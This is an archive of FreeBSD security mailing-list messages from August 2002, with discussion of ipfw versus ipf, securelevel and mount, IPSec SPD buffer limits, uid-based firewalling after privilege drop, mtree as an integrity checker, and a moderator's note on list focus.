just form mount? Like kern.mount_disabled, which, when set to 1, cannot be reverted back. -- #- Winfried -------- wrzask@IRCNet -||- GG# 3838383 -||- JS500-RIPE -# #- w@dream.vg ---- w@303.krakow.pl -||--- http://violent.dream.vg ---# #- Never underestimate the power of stupid people in large numbers. -# To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 1:37:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2D67937B400 for ; Fri, 23 Aug 2002 01:37:18 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id C089E43E3B for ; Fri, 23 Aug 2002 01:37:16 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 39950 invoked by uid 1017); 23 Aug 2002 08:37:14 -0000 Date: Fri, 23 Aug 2002 10:37:14 +0200 From: Nomad To: freebsd-security@freebsd.org Subject: Re: Firewalls on FreeBSD( ipfw vs ipf) Message-ID: <20020823083714.GA39848@killer.crypton.pl> References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm using ipfw and I'am very happy with that. You can do almost everything with that. If you want to use traffic shaper from dummynet remember, that only ipfw supports that. I don't know, if divert is supported by ipf to. And divert sockets can be very useful tool. I tried few times to configure my firewall on ipf, but every time I have returned to ipfw. Maybe because it's the one I know very well... It's will be nice to me hear something intresting about ipf advantages. I'm using ipfw. But which one you'll choose it's very your decision. Regards Nomad On Thu, Aug 22, 2002 at 01:54:43PM +0200, Conrad Burger wrote: > Hi all > > > > I need some help on deciding which firewall I should use to secure my > intranet from the internet. > > > > I cannot decide which way to go , IPF or IPFW ! > > > > Which one is recommended , easiest to configure and support. > > > > Can anyone please point me to some information explaining the difference > between IPFW and IPFW2. > > > > A document on IPFW vs IPF would also help. > > > > Thanks > > Conrad > -- Nomad Poznan, Poland To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 3:24:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4914837B400; Fri, 23 Aug 2002 03:24:06 -0700 (PDT) Received: from antalya.lupe-christoph.de (pD9E8862A.dip0.t-ipconnect.de [217.232.134.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1B24A43E6E; Fri, 23 Aug 2002 03:24:05 -0700 (PDT) (envelope-from lupe@lupe-christoph.de) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id D7AF25EB; Fri, 23 Aug 2002 12:24:02 +0200 (CEST) Date: Fri, 23 Aug 2002 12:24:02 +0200 To: Jan Srzednicki Cc: Johan Karlsson , freebsd-bugs@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: kern/22142: securelevel does not affect mount Message-ID: <20020823102402.GC26115@lupe-christoph.de> References: <200208230144.g7N1itTB030484@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Friday, 2002-08-23 at 09:43:15 +0200, Jan Srzednicki wrote: > On Thu, 22 Aug 2002, Johan Karlsson wrote: > > Synopsis: securelevel does not affect mount > > Responsible-Changed-From-To: freebsd-bugs->freebsd-security > > Responsible-Changed-By: johan > > Responsible-Changed-When: Thu Aug 22 18:41:46 PDT 2002 > > Responsible-Changed-Why: > > Lets get -security's opinion about this. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 > I'm afraid changin securelevel's behaviour would break some system schemes > out there, which is rather unwanted thing for -STABLE. One thing we can do > is to wait for MACs in -CURRENT. Maybe a better solution is to add another > sysctl just form mount? Like kern.mount_disabled, which, when set to 1, > cannot be reverted back. It would break my system disk cloning scheme. Currently I mount the cloning targets, rsync the live copy, and umount the clones. That way, they will not need fsck'ing when I need them. NO big thing, though. But on a different (Linux) machine, I write dumps to a Zip drive. The medium is umounted and ejected when it's full, to be replaced by the alternate medium. So I agree a finer grained control is need. Preferably even tunable per device, allowing the Zip drive to be mounted/umounted, but no other device. I haven't looked at -CURRENT at all. How fine grained are those MACs? (Excuse me for not having the time right now to read up on them.) Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | Big Misunderstandings #6398: The Titanic was not supposed to be | | unsinkable. The designer had a speech impediment. He said: "I have | | thith great unthinkable conthept ..." | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 6:40:14 2002 Delivered-To: freebsd-security@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 612A637B400 for ; Fri, 23 Aug 2002 06:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 02EA443E72 for ; Fri, 23 Aug 2002 06:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7NDe3JU061628 for ; Fri, 23 Aug 2002 06:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7NDe3fa061627; Fri, 23 Aug 2002 06:40:03 -0700 (PDT) Date: Fri, 23 Aug 2002 06:40:03 -0700 (PDT) Message-Id: <200208231340.g7NDe3fa061627@freefall.freebsd.org> To: freebsd-security@FreeBSD.org Cc: From: Johan Karlsson Subject: Fwd: Re: kern/22142: securelevel does not affect mount Reply-To: Johan Karlsson Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/22142; it has been noted by GNATS. From: Johan Karlsson To: bug-followup@freebsd.org Cc: Subject: Fwd: Re: kern/22142: securelevel does not affect mount Date: Fri, 23 Aug 2002 15:35:07 +0200 Attach to audit-trail. ----- Forwarded message from Lupe Christoph ----- From: lupe@lupe-christoph.de (Lupe Christoph) To: Jan Srzednicki Cc: Johan Karlsson , freebsd-bugs@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: kern/22142: securelevel does not affect mount Date: Fri, 23 Aug 2002 12:24:02 +0200 On Friday, 2002-08-23 at 09:43:15 +0200, Jan Srzednicki wrote: > On Thu, 22 Aug 2002, Johan Karlsson wrote: > > Synopsis: securelevel does not affect mount > > Responsible-Changed-From-To: freebsd-bugs->freebsd-security > > Responsible-Changed-By: johan > > Responsible-Changed-When: Thu Aug 22 18:41:46 PDT 2002 > > Responsible-Changed-Why: > > Lets get -security's opinion about this. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 > I'm afraid changin securelevel's behaviour would break some system schemes > out there, which is rather unwanted thing for -STABLE. One thing we can do > is to wait for MACs in -CURRENT. Maybe a better solution is to add another > sysctl just form mount? Like kern.mount_disabled, which, when set to 1, > cannot be reverted back. It would break my system disk cloning scheme. Currently I mount the cloning targets, rsync the live copy, and umount the clones. That way, they will not need fsck'ing when I need them. NO big thing, though. But on a different (Linux) machine, I write dumps to a Zip drive. The medium is umounted and ejected when it's full, to be replaced by the alternate medium. So I agree a finer grained control is need. Preferably even tunable per device, allowing the Zip drive to be mounted/umounted, but no other device. I haven't looked at -CURRENT at all. How fine grained are those MACs? (Excuse me for not having the time right now to read up on them.) Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | Big Misunderstandings #6398: The Titanic was not supposed to be | | unsinkable. The designer had a speech impediment. He said: "I have | | thith great unthinkable conthept ..." | ----- End forwarded message ----- -- Johan Karlsson mailto:johan@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 13:25:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3F6FA37B400 for ; Fri, 23 Aug 2002 13:25:33 -0700 (PDT) Received: from dragon.ichi.net (dragon.ichi.net [209.42.196.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id 64D8B43E4A for ; Fri, 23 Aug 2002 13:25:32 -0700 (PDT) (envelope-from freebsd-security@ichi.net) Received: from coaster (localhost.localdomain [127.0.0.1]) by dragon.ichi.net (8.11.6/8.11.6) with ESMTP id g7NKDq503411 for ; Fri, 23 Aug 2002 16:13:53 -0400 Content-Type: text/plain; charset="us-ascii" From: Ju Ichi To: freebsd-security@FreeBSD.ORG Subject: IPSec SPD limit? Date: Fri, 23 Aug 2002 16:24:14 -0400 User-Agent: KMail/1.4.1 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200208231624.14487.freebsd-security@ichi.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm not sure exactly which mailing list to send this question to, but I hope the third time is a charm. :-) We are trying to setup a large IPSec SPD (in excess of 1000 SAs) on the following hardware/software config: Compaq DL360 with dual 1.4GHz processsors 2GB RAM 4GB swap space 4.6.1-RELEASE-p11 racoon-20020507a We get a "send: No buffer space available" when trying to read in the /etc/ipsec.conf file if it has more than about 1000 entries. Also, if we do a setkey -DP after trying to read in /etc/ipsec.conf we get "recv: Resource temporarily unavailable" after it lists some of the SAs. Several kernel tweaks have been tried. For example, we have tried setting MAXUSERS from 0 to 1024 on bit boundaries (0, 128, 256, 512, and 1024). FWIW, setting it to 1024 seems to be evil. ;-) We have also tried various settings in the kernel config file on NMBCLUSTERS, NMBUFS, NBUF, MAXDSIZ, MAXSSIZ, DFLDSIZ, and MAXFILES. In addition, we have tweaked kern.ipc.somaxconn, net.inet.tcp.sendspace, net.inet.tcp.recvspace, net.inet.udp.recvspace, and net.inet.udp.maxdgram after reading some performance tuning web pages. I can provide additional details as needed, but didn't want to make this initial request too long. Does anyone know of any limits on the number of entries the SPD can hold and if so how to make the limits higher? Thanks in advance, Ju To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 16:50:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6436C37B400 for ; Fri, 23 Aug 2002 16:50:06 -0700 (PDT) Received: from usenix.org (voyager.usenix.org [131.106.3.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0200F43E65 for ; Fri, 23 Aug 2002 16:50:06 -0700 (PDT) (envelope-from sam@usenix.org) Received: from melange (melange.errno.com [66.127.85.82]) (authenticated (0 bits)) by usenix.org (Switch-2.1.3/Switch-2.1.0) with ESMTP id g7NNntS16799 (using TLSv1/SSLv3 with cipher RC4-MD5 (128 bits) verified NO); Fri, 23 Aug 2002 16:50:03 -0700 (PDT) Message-ID: <006101c24aff$cce8cd00$52557f42@errno.com> From: "Sam Leffler (at Usenix)" To: "Ju Ichi" , References: <200208231624.14487.freebsd-security@ichi.net> Subject: Re: IPSec SPD limit? Date: Fri, 23 Aug 2002 16:49:55 -0700 Organization: Usenix Association MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-DCC-Usenix-Metrics: voyager 1010; Body=2 Fuz1=2 Fuz2=2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > We are trying to setup a large IPSec SPD (in excess of 1000 SAs) on the > following hardware/software config: > > Compaq DL360 with dual 1.4GHz processsors > 2GB RAM > 4GB swap space > > 4.6.1-RELEASE-p11 > racoon-20020507a > > We get a "send: No buffer space available" when trying to read in the > /etc/ipsec.conf file if it has more than about 1000 entries. Also, if we do > a setkey -DP after trying to read in /etc/ipsec.conf we get > "recv: Resource temporarily unavailable" after it lists some of the SAs. > > Several kernel tweaks have been tried. For example, we have tried setting > MAXUSERS from 0 to 1024 on bit boundaries (0, 128, 256, 512, and 1024). > FWIW, setting it to 1024 seems to be evil. ;-) We have also tried various > settings in the kernel config file on NMBCLUSTERS, NMBUFS, NBUF, MAXDSIZ, > MAXSSIZ, DFLDSIZ, and MAXFILES. In addition, we have tweaked > kern.ipc.somaxconn, net.inet.tcp.sendspace, net.inet.tcp.recvspace, > net.inet.udp.recvspace, and net.inet.udp.maxdgram after reading some > performance tuning web pages. I can provide additional details as needed, > but didn't want to make this initial request too long. > > Does anyone know of any limits on the number of entries the SPD can hold and > if so how to make the limits higher? > setkey -DP returns the SA's via a PF_KEY socket. You're hitting the upper bound on the amount of data that can be stored in a socket of this type as all the data is returned en masse (i.e. the process isn't given an opportunity to read data). PF_KEY sockets inherit the send+recv space reserves of raw sockets: ebb# gdb -k /kernel /dev/mem ... (kgdb) p raw_sendspace $1 = 8192 (kgdb) p raw_recvspace $2 = 8192 You can either work around this by upping these values or patch the PF_KEY code to set the reserves on the socket explicitly (and provide sysctl's a la udp+tcp to control the upper bounds). Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 0: 7: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4757237B400 for ; Sat, 24 Aug 2002 00:06:59 -0700 (PDT) Received: from mail.npubs.com (npubs.com [207.111.208.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id D216843E75 for ; Sat, 24 Aug 2002 00:06:58 -0700 (PDT) (envelope-from nielsen@memberwebs.com) From: "Nielsen" To: "Sam Leffler (at Usenix)" , "Ju Ichi" , References: <200208231624.14487.freebsd-security@ichi.net> <006101c24aff$cce8cd00$52557f42@errno.com> Subject: Re: IPSec SPD limit? MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020824070827.0770A43B742@mail.npubs.com> Date: Sat, 24 Aug 2002 07:08:27 +0000 (GMT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What I did here was pipe the values in batches through 'setkey -c'. It seems like the limit is much higher in the kernel than you can set in one shot. Nate Nielsen ----- Original Message ----- From: "Sam Leffler (at Usenix)" To: "Ju Ichi" ; Sent: Friday, August 23, 2002 17:54 Subject: Re: IPSec SPD limit? > > We are trying to setup a large IPSec SPD (in excess of 1000 SAs) on the > > following hardware/software config: > > > > Compaq DL360 with dual 1.4GHz processsors > > 2GB RAM > > 4GB swap space > > > > 4.6.1-RELEASE-p11 > > racoon-20020507a > > > > We get a "send: No buffer space available" when trying to read in the > > /etc/ipsec.conf file if it has more than about 1000 entries. Also, if we > do > > a setkey -DP after trying to read in /etc/ipsec.conf we get > > "recv: Resource temporarily unavailable" after it lists some of the SAs. > > > > Several kernel tweaks have been tried. For example, we have tried setting > > MAXUSERS from 0 to 1024 on bit boundaries (0, 128, 256, 512, and 1024). > > FWIW, setting it to 1024 seems to be evil. ;-) We have also tried > various > > settings in the kernel config file on NMBCLUSTERS, NMBUFS, NBUF, MAXDSIZ, > > MAXSSIZ, DFLDSIZ, and MAXFILES. In addition, we have tweaked > > kern.ipc.somaxconn, net.inet.tcp.sendspace, net.inet.tcp.recvspace, > > net.inet.udp.recvspace, and net.inet.udp.maxdgram after reading some > > performance tuning web pages. I can provide additional details as needed, > > but didn't want to make this initial request too long. > > > > Does anyone know of any limits on the number of entries the SPD can hold > and > > if so how to make the limits higher? > > > > setkey -DP returns the SA's via a PF_KEY socket. You're hitting the upper > bound on the amount of data that can be stored in a socket of this type as > all the data is returned en masse (i.e. the process isn't given an > opportunity to read data). PF_KEY sockets inherit the send+recv space > reserves of raw sockets: > > ebb# gdb -k /kernel /dev/mem > ... > (kgdb) p raw_sendspace > $1 = 8192 > (kgdb) p raw_recvspace > $2 = 8192 > > You can either work around this by upping these values or patch the PF_KEY > code to set the reserves on the socket explicitly (and provide sysctl's a la > udp+tcp to control the upper bounds). > > Sam > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 3:49:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED5C837B400 for ; Sat, 24 Aug 2002 03:49:45 -0700 (PDT) Received: from mxzilla3.xs4all.nl (mxzilla3.xs4all.nl [194.109.6.49]) by mx1.FreeBSD.org (Postfix) with ESMTP id EB83143E77 for ; Sat, 24 Aug 2002 03:49:44 -0700 (PDT) (envelope-from rmeijer@xs4all.nl) Received: from xs1.xs4all.nl (xs1.xs4all.nl [194.109.6.80]) by mxzilla3.xs4all.nl (8.12.3/8.12.3) with ESMTP id g7OAnhkb044206 for ; Sat, 24 Aug 2002 12:49:43 +0200 (CEST) Received: from localhost (rmeijer@localhost) by xs1.xs4all.nl (8.11.6/8.11.6) with ESMTP id g7OAnhg01051 for ; Sat, 24 Aug 2002 12:49:43 +0200 (CEST) (envelope-from rmeijer@xs1.xs4all.nl) Date: Sat, 24 Aug 2002 12:49:43 +0200 (CEST) From: Rob J Meijer To: freebsd-security@FreeBSD.ORG Subject: user based firewalling with ipfw and priviledged ports. In-Reply-To: <20020823083714.GA39848@killer.crypton.pl> Message-ID: <20020824100341.T75248-100000@xs1.xs4all.nl> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lately I have been trying to port a public domain software project of mine (cduck) to the FreeBSD platform. On the original platform (Linux) I made use of iptables with the owner module, and on FreeBSD of ipfw and the user based filtering that they provide. I use these filters in order to set up an extended chroot enviroment for servers that make up my project. For the most part this seems to work perfectly, and I did not discover the problem that seems to apear with both iptables on Linux and with ipfw on FreeBSD untill by change I ran into it while porting to FreeBSD. First I thought it was a problem only in FreeBSD, but later I confirmed that the same problem was also pressent on the original platform, and seems thus to be a rather fundamental problem. The problem is that I need to bind to a priviledged port, and in order to do this I need to start as root and than change the (e&r) uid of the process to the target uid. It apears that the changing of the process its uid does not change the way that the user bit of trafic from the specific socket is seen, both iptables and ipfw interpret the trafic as comming from the root user. For most part, with statical firewall rules this would not be a problem, however I am using the logs of ipfw in a trivial intrusion detection system (part of my project) that will try to pull the network plug on compromized subsystems by denying all trafic from the user that the service is running as. It seems this is a fundamental flaw in the design in ipfw on FreeBSD (and for that mnather also in iptables on Linux). Am I right in assuming this to be such a flaw, is this problem known, or is there some flaw in the way I am binding to a priviledged port that I could fix in my project. (I already tried duplicating the socket after changing user, this has no effect either). T.I.A. Rob J Meijer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 5:26:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A012337B400 for ; Sat, 24 Aug 2002 05:26:20 -0700 (PDT) Received: from HAL9000.homeunix.com (12-232-220-15.client.attbi.com [12.232.220.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 25EFF43E65 for ; Sat, 24 Aug 2002 05:26:20 -0700 (PDT) (envelope-from dschultz@uclink.Berkeley.EDU) Received: from HAL9000.homeunix.com (localhost [127.0.0.1]) by HAL9000.homeunix.com (8.12.5/8.12.5) with ESMTP id g7OCQwJ7007630; Sat, 24 Aug 2002 05:26:58 -0700 (PDT) (envelope-from dschultz@uclink.Berkeley.EDU) Received: (from das@localhost) by HAL9000.homeunix.com (8.12.5/8.12.5/Submit) id g7OCQrsD007629; Sat, 24 Aug 2002 05:26:53 -0700 (PDT) (envelope-from dschultz@uclink.Berkeley.EDU) Date: Sat, 24 Aug 2002 05:26:53 -0700 From: David Schultz To: Rob J Meijer Cc: freebsd-security@FreeBSD.ORG Subject: Re: user based firewalling with ipfw and priviledged ports. Message-ID: <20020824122653.GB4994@HAL9000.homeunix.com> Mail-Followup-To: Rob J Meijer , freebsd-security@FreeBSD.ORG References: <20020823083714.GA39848@killer.crypton.pl> <20020824100341.T75248-100000@xs1.xs4all.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020824100341.T75248-100000@xs1.xs4all.nl> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Rob J Meijer : > The problem is that I need to bind to a priviledged port, and in order to > do this I need to start as root and than change the (e&r) uid of the > process to the target uid. It apears that the changing of the process its > uid does not change the way that the user bit of trafic from the specific > socket is seen, both iptables and ipfw interpret the trafic as comming > from the root user. I believe this is the correct behavior. In Unix, access checks are done only when you open a file or socket, not every time you try to read()/write()/accept()/whatever on a file descriptor. That's why you can still access that socket you opened as root even after you drop privileges! IPFW is doing the right thing; when your program accesses a socket that it opened while holding root privileges, it is essentially doing so with root credentials. Perhaps this behavior should be documented on the ipfw manpage, since it's pretty common for programs to bind to privileged ports and then drop root privileges. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 11: 1: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C21C437B400 for ; Sat, 24 Aug 2002 11:00:58 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id BD1E443E4A for ; Sat, 24 Aug 2002 11:00:49 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from DaleCoportable [12.145.226.229] by mail.gbronline.com (SMTPD32-7.12) id A9AD6354002C; Sat, 24 Aug 2002 13:00:13 -0500 Message-ID: <01d901c24b97$ac3c8ef0$a9ec910c@DaleCoportable> From: "Kevin D. Kinsey, DaleCo, S.P." To: Subject: Mtree as IDS - Advisable? Tutorial? Date: Sat, 24 Aug 2002 12:57:10 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Good day, Mail archives at freebsd.org, neohapsis, google refer to using mtree as an IDS with tripwire like functionality. Reading mtree(8) as of yet has been unenlightening, I'll continue looking, but wanted some opines from the list... Is mtree a workable and advisable solution? And, if so, any tutorials out there that you know of, besides the manpage (raise hand "i do solemly swear to keep studying it...") Thanks for your input. Kevin Kinsey, DaleCo, S.P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 11:16:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7F85637B400 for ; Sat, 24 Aug 2002 11:16:08 -0700 (PDT) Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0B1FD43E6E for ; Sat, 24 Aug 2002 11:16:08 -0700 (PDT) (envelope-from nitewolfe@attbi.com) Received: from darkness ([12.247.4.104]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020824181607.PNTJ11061.sccrmhc01.attbi.com@darkness> for ; Sat, 24 Aug 2002 18:16:07 +0000 Message-ID: <001301c24b9a$39582540$0200a8c0@darkness> From: "Greg" To: Subject: Date: Sat, 24 Aug 2002 13:15:25 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C24B70.4EDC5C80" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C24B70.4EDC5C80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable subscribe ------=_NextPart_000_0010_01C24B70.4EDC5C80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
subscribe
------=_NextPart_000_0010_01C24B70.4EDC5C80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 13: 3:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EB2C837B400 for ; Sat, 24 Aug 2002 13:03:51 -0700 (PDT) Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.157.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0540D43E4A for ; Sat, 24 Aug 2002 13:03:47 -0700 (PDT) (envelope-from mark@grimreaper.grondar.org) Received: from storm.FreeBSD.org.uk (uucp@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.12.5/8.12.5) with ESMTP id g7OI5Eqa083682 for ; Sat, 24 Aug 2002 19:05:14 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Received: (from uucp@localhost) by storm.FreeBSD.org.uk (8.12.5/8.12.5/Submit) with UUCP id g7OI5EjH083681 for security@freebsd.org; Sat, 24 Aug 2002 19:05:14 +0100 (BST) Received: from grimreaper.grondar.org (localhost [127.0.0.1]) by grimreaper.grondar.org (8.12.5/8.12.5) with ESMTP id g7OI16t0000946 for ; Sat, 24 Aug 2002 19:01:06 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Message-Id: <200208241801.g7OI16t0000946@grimreaper.grondar.org> To: security@freebsd.org Subject: HEADS UP! Signal-to-noise ratio here is _terrible_. Date: Sat, 24 Aug 2002 19:01:06 +0100 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello FreeBSD-Security subscriber The signal-to-noise ratio on this list is _terrible_. How many of you have noticed that FreeBSD's security-savvy folks are being drowed out in a sea of chatter? We need to get back to a focussed list that does not duplicate the functions of other lists. o This list needs to return to being a list for technical discussion by folks implementing the technology that FreeBSD offers. This means that if you are a programmer writing security code or a system administrator with specific requirements, then this is the place to be. If you have bugs to report, please submit them via send-pr, or if you need to discuss them AND you KNOW they are not potentially trivial, then please only bring them here if they are NOT more relevant to FreeBSD-Current, FreeBSD-Stable or FreeBSD-Hackers. If you have an important security hole to report, please consider reporting it to the Security Officer (security-officer@FreeBSD.org) if you wish to keep it under wraps until it is fixed. o Welcome topics are security policy, security design issues, tricky security portability issues and so on. o This needs to stop being a duplicate of FreeBSD-Questions. There are 2 lists for asking questions (FreeBSD-Questions and FreeBSD-Newbies). The simple fact that your question has nominally to do with security is NOT (repeat NOT) an excuse to ask it here. Far too many questions asked here are basic system administration issues that are answered trivially in available documentation. The vast majority of questions asked here are best discussed in the Newbies list. Please read the FAQ and the handbook, and if your question is not answered there, please contribute the question AND the answer back to the documentation folks (FreeBSD-Docs). o This is not the list to talk about build problems, OS crashes and the like (even if they involve a security subsystems). Compile problems are for FreeBSD-Current or FreeBSD-Stable. o Subscribers are encouraged to "lurk" before contributing, and are further encouraged to only contribute "signal" and resist all temptation to add to the noise. 